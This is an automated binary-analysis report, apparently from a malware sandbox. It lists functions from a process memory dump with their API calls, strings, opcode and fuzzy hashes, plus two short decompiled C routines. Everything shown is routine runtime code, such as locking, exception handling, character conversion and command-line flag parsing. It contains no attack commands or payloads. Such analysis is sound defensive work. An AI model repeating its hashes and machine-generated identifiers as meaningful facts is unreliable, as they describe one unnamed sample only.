                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$Initialize$DeleteErrorH_prolog3_Last_swprintfconnect
                                                                                                                        • String ID: ncSocket::NotifySocket(): connect error code:
                                                                                                                        • API String ID: 621515900-2945146241
                                                                                                                        • Opcode ID: 50255745ec3ca45fed0bde5cdbc8f0377749779705cdb159496a0795fb1705fc
                                                                                                                        • Instruction ID: 419566dfe3d4eeeabf7ed428c344a919846746c461fd325833273f79c6a0e7b5
                                                                                                                        • Opcode Fuzzy Hash: 50255745ec3ca45fed0bde5cdbc8f0377749779705cdb159496a0795fb1705fc
                                                                                                                        • Instruction Fuzzy Hash: 0C21C670C04289EADB15EBA4CC9AAEEBB34AF21305F14416DE152672E1DB782E44C755
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00498774, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0049877B
                                                                                                                          • Part of subcall function 0047FD97: __EH_prolog3.LIBCMT ref: 0047FD9E
                                                                                                                          • Part of subcall function 0047EFBC: __EH_prolog3.LIBCMT ref: 0047EFC3
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004987DA
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        Strings
                                                                                                                        • StringStore: missing InputBuffer argument, xrefs: 004987AB
                                                                                                                        • InputBuffer, xrefs: 0049879F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$ExceptionException@8RaiseThrow
                                                                                                                        • String ID: InputBuffer$StringStore: missing InputBuffer argument
                                                                                                                        • API String ID: 1412866469-2380213735
                                                                                                                        • Opcode ID: 44ec55b9b5fae38dfb7fa5c22f643a1cefd1d1a489f9f8346e48e67269840b60
                                                                                                                        • Instruction ID: 132df2d07a990b5e890274b4591fa2d819ca771c45cb11b3d84564ae36daedb5
                                                                                                                        • Opcode Fuzzy Hash: 44ec55b9b5fae38dfb7fa5c22f643a1cefd1d1a489f9f8346e48e67269840b60
                                                                                                                        • Instruction Fuzzy Hash: 89112B7194024AAFDF10EFE8C891DEEBBB5BF14304F5044AEE105A7282DB756E08CB65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004EA761, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004EA768
                                                                                                                        • WaitForSingleObject.KERNEL32(?,?,00000000,004DC578,000000FF,?,00000000,004DDCE3,00000001,WaitAtGateway,00000000,000003E4), ref: 004EA777
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004378AA: __EH_prolog3.LIBCMT ref: 004378B1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalInitializeObjectSectionSingleWait
                                                                                                                        • String ID: Thread.Join.Failed$Thread.Join.Timeout
                                                                                                                        • API String ID: 1751434422-2669456123
                                                                                                                        • Opcode ID: 46ca84cd5f4a9857659830969dd8dcc59cab7544f09b66f277d9d625b23887c0
                                                                                                                        • Instruction ID: 6ccdec6453605177a1c9418ddd035f0f1f3f2c7586396fbc4a122f84fd1fb71d
                                                                                                                        • Opcode Fuzzy Hash: 46ca84cd5f4a9857659830969dd8dcc59cab7544f09b66f277d9d625b23887c0
                                                                                                                        • Instruction Fuzzy Hash: 2801D470A01110679A24BFB6881B49E7E21EF82772F20831AF5664B2D1DA385A50D7D6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 005495FF, Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0054962F
                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00549663
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,?,?), ref: 00549694
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,?), ref: 00549702
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3058430110-0
                                                                                                                        • Opcode ID: aea1ab6f5513ba04af648e8029ed810645809549fdcb4df93358e5e3ff2855a3
                                                                                                                        • Instruction ID: e5dd075bd14d5e75a6f249af7a3ff7156b7de346e643741568f76b5422eebeb9
                                                                                                                        • Opcode Fuzzy Hash: aea1ab6f5513ba04af648e8029ed810645809549fdcb4df93358e5e3ff2855a3
                                                                                                                        • Instruction Fuzzy Hash: D431BE31A04246EFDF20EFA4C886EEB7FB5BF01319F1689A9E4658B191D330D940DB51
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004A2328, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(?,2F9F5BE6,00000001,00000000), ref: 004A237D
                                                                                                                          • Part of subcall function 004A1DC7: __EH_prolog3_catch.LIBCMT ref: 004A1DCE
                                                                                                                          • Part of subcall function 004A1DC7: EnterCriticalSection.KERNEL32(?,0000000C,004A17D4,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A1DDF
                                                                                                                          • Part of subcall function 004A1DC7: LeaveCriticalSection.KERNEL32(00000008,?,?,?,0044D2A4,00000002), ref: 004A1E1A
                                                                                                                        • _wmemset.LIBCPMT ref: 004A2399
                                                                                                                        • __vsnprintf_c_l.LIBCMT ref: 004A23AE
                                                                                                                          • Part of subcall function 00538691: __vswprintf_helper.LIBCMT ref: 005386A8
                                                                                                                          • Part of subcall function 004A1A2A: __EH_prolog3.LIBCMT ref: 004A1A31
                                                                                                                          • Part of subcall function 004A1A2A: InitializeCriticalSection.KERNEL32(?,00000028,004A24F0,?,00000000,00000000,00000000,?,?,00000002,?,00000000,0000042C), ref: 004A1A46
                                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004BE3C7,00000000,0077C1F8,00000000,000001F8,?,?,?,0044D2A4,00000002), ref: 004A1C05
                                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,0044D2A4,00000002), ref: 004A1C45
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 004A23E7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterH_prolog3Leave$DeleteH_prolog3_catchInitialize__vsnprintf_c_l__vswprintf_helper_wmemset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4194284523-0
                                                                                                                        • Opcode ID: 5900aa0bf7395fb5038aed8c814d7b50bd5234d5f3988f045980ee0d0d58b7cc
                                                                                                                        • Instruction ID: aff3d7849d96d95b584263cba1bf6186ab4ca9716271c606ad5e587042c4aac5
                                                                                                                        • Opcode Fuzzy Hash: 5900aa0bf7395fb5038aed8c814d7b50bd5234d5f3988f045980ee0d0d58b7cc
                                                                                                                        • Instruction Fuzzy Hash: 43219F71900289AFDB11DFA4CC81AEEB7B8FB58304F10852EF555E7290EB786A448B64
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004A2712, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004A2719
                                                                                                                        • EnterCriticalSection.KERNEL32(?,0000004C,004BF2D2, NI,00000001,00833EB8,0000002C,004BDD2C), ref: 004A2727
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004A27EF
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                        • LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,00000000,?), ref: 004A27DE
                                                                                                                          • Part of subcall function 004A1E9D: __EH_prolog3.LIBCMT ref: 004A1EA4
                                                                                                                          • Part of subcall function 004A1E9D: EnterCriticalSection.KERNEL32(?,00000004,004A278C,00000000,00000000,?,00000000,?), ref: 004A1EB2
                                                                                                                          • Part of subcall function 004A1E9D: CharUpperW.USER32(00000000), ref: 004A1EC9
                                                                                                                          • Part of subcall function 004A1E9D: LeaveCriticalSection.KERNEL32(?), ref: 004A1EDC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$H_prolog3Leave$Enter$CharInitializeUpper
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2091688341-0
                                                                                                                        • Opcode ID: 6bfce428f6342b53122b42cbcf1b73ed16168ebc7a41f4f1eeed34a61fe4e977
                                                                                                                        • Instruction ID: 1e69aa617de223fc617bd2d8ab6b25677be807872c46e10db52ea2b2cc141346
                                                                                                                        • Opcode Fuzzy Hash: 6bfce428f6342b53122b42cbcf1b73ed16168ebc7a41f4f1eeed34a61fe4e977
                                                                                                                        • Instruction Fuzzy Hash: E821D335801205AADB11EBB8CD45BEDFBB4BF22314F14421EE422A72E1DB786F44D758
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33A230, Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33A230() {
				int _v4;
				char _v7;
				char _v8;
				intOrPtr* _t15;
				char _t18;
				int _t23;
				signed int _t29;
				void* _t32;

				if(GetCommandLineA() == 0) {
					L20:
					ExitProcess(0);
				}
				_v4 = 0;
				_t32 = E6F33A3D0(_t12,  &_v4);
				if(_t32 == 0) {
					L19:
					goto L20;
				}
				_t23 = _v4;
				if(_t23 <= 2) {
					L18:
					LocalFree(_t32);
					goto L19;
				}
				_t29 = 2;
				if(_t23 <= 2) {
					L17:
					goto L18;
				}
				do {
					_t15 =  *((intOrPtr*)(_t32 + _t29 * 4));
					if( *((char*)(_t15 + 1)) != 0) {
						goto L10;
					}
					_v8 =  *_t15;
					_v7 = 0;
					CharLowerA( &_v8);
					_t18 = _v8;
					if(_t18 == 0x66) {
						E6F33A130(1);
						L15:
						L16:
						goto L17;
					}
					if(_t18 == 0x65) {
						E6F33A130(0);
						goto L15;
					}
					if(_t18 == 0x75) {
						E6F339BD0(1);
						goto L15;
					}
					_t23 = _v4;
					L10:
					_t29 = _t29 + 1;
				} while (_t29 < _t23);
				goto L16;
			}











                                                                                                                        0x6f33a23b
                                                                                                                        0x6f33a2dd
                                                                                                                        0x6f33a2df
                                                                                                                        0x6f33a2df
                                                                                                                        0x6f33a248
                                                                                                                        0x6f33a255
                                                                                                                        0x6f33a25c
                                                                                                                        0x6f33a2dc
                                                                                                                        0x00000000
                                                                                                                        0x6f33a2dc
                                                                                                                        0x6f33a25e
                                                                                                                        0x6f33a265
                                                                                                                        0x6f33a2d5
                                                                                                                        0x6f33a2d6
                                                                                                                        0x00000000
                                                                                                                        0x6f33a2d6
                                                                                                                        0x6f33a268
                                                                                                                        0x6f33a26f
                                                                                                                        0x6f33a2d4
                                                                                                                        0x00000000
                                                                                                                        0x6f33a2d4
                                                                                                                        0x6f33a280
                                                                                                                        0x6f33a280
                                                                                                                        0x6f33a288
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33a291
                                                                                                                        0x6f33a295
                                                                                                                        0x6f33a29a
                                                                                                                        0x6f33a29c
                                                                                                                        0x6f33a2a2
                                                                                                                        0x6f33a2b9
                                                                                                                        0x6f33a2d0
                                                                                                                        0x6f33a2d3
                                                                                                                        0x00000000
                                                                                                                        0x6f33a2d3
                                                                                                                        0x6f33a2a6
                                                                                                                        0x6f33a2c2
                                                                                                                        0x00000000
                                                                                                                        0x6f33a2c2
                                                                                                                        0x6f33a2aa
                                                                                                                        0x6f33a2cb
                                                                                                                        0x00000000
                                                                                                                        0x6f33a2cb
                                                                                                                        0x6f33a2ac
                                                                                                                        0x6f33a2b0
                                                                                                                        0x6f33a2b0
                                                                                                                        0x6f33a2b1
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • GetCommandLineA.KERNEL32 ref: 6F33A233
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F33A2DF
                                                                                                                          • Part of subcall function 6F33A3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6F33A3DB
                                                                                                                          • Part of subcall function 6F33A3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6F33A3F4
                                                                                                                        • CharLowerA.USER32(?,?,?,?,?,?), ref: 6F33A29A
                                                                                                                        • LocalFree.KERNEL32(00000000,?), ref: 6F33A2D6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Local$AllocCharCommandExitFreeLineLowerProcesslstrlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4176052798-0
                                                                                                                        • Opcode ID: 45b02f9bcce8a1a4ee07437cb1ba249ed157c0e17c44d5675a529c353e9943aa
                                                                                                                        • Instruction ID: 62b543cad9f8bf822fa7c11b2b4b434f62112e2da109fba511b37d372d18994b
                                                                                                                        • Opcode Fuzzy Hash: 45b02f9bcce8a1a4ee07437cb1ba249ed157c0e17c44d5675a529c353e9943aa
                                                                                                                        • Instruction Fuzzy Hash: 6B11273BC4C3E89FDF00DAA88804B9A7BDE5F52315F00041AE09AC21C2C7A3A445A7A3
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004A2AB5, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004A2ABC
                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000004,004DCD5C,00784028,00000001,00000000,?,00000001,00000001,?,?), ref: 004A2ACA
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004A2AE5
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004A2B34
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$Leave$EnterH_prolog3
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2873666866-0
                                                                                                                        • Opcode ID: 4e9e88b97d49e07eb329c0f5b348c98fc11682ffaeb046cc33372730c3482b49
                                                                                                                        • Instruction ID: 7b243691d3346a8cff939f8a190051535b0a0705e5ac48a72c44950eb4b4ad62
                                                                                                                        • Opcode Fuzzy Hash: 4e9e88b97d49e07eb329c0f5b348c98fc11682ffaeb046cc33372730c3482b49
                                                                                                                        • Instruction Fuzzy Hash: 2F01D630A0030287DF365F2C8A4537FB7A5BBA3311F10550AD462962A1CBBC6942F728
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33A2F0, Relevance: 6.0, APIs: 4, Instructions: 49memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 90%
                                                                                                                        			E6F33A2F0(short* _a4, signed int _a8, intOrPtr* _a12) {
				intOrPtr* _t11;
				char* _t12;
				int _t13;
				int _t17;
				short* _t18;

				_t18 = _a4;
				_t12 = 0;
				asm("sbb esi, esi");
				_t17 =  ~_a8 & 0x0000fde9;
				_t13 = WideCharToMultiByte(_t17, 0, _t18, 0xffffffff, 0, 0, 0, 0);
				if(_t13 > 0) {
					_t3 = _t13 + 1; // 0x1
					_t12 = HeapAlloc(GetProcessHeap(), 8, _t3);
					WideCharToMultiByte(_t17, 0, _t18, 0xffffffff, _t12, _t13, 0, 0);
					_t11 = _a12;
					if(_t11 != 0) {
						 *_t11 = _t13 - 1;
					}
				}
				return _t12;
			}








                                                                                                                        0x6f33a2f2
                                                                                                                        0x6f33a2fc
                                                                                                                        0x6f33a307
                                                                                                                        0x6f33a30a
                                                                                                                        0x6f33a317
                                                                                                                        0x6f33a31b
                                                                                                                        0x6f33a31d
                                                                                                                        0x6f33a335
                                                                                                                        0x6f33a33e
                                                                                                                        0x6f33a344
                                                                                                                        0x6f33a34a
                                                                                                                        0x6f33a34d
                                                                                                                        0x6f33a34d
                                                                                                                        0x6f33a34a
                                                                                                                        0x6f33a355

                                                                                                                        APIs
                                                                                                                        • WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6F336F16,00A56660,00000001,0000009C), ref: 6F33A311
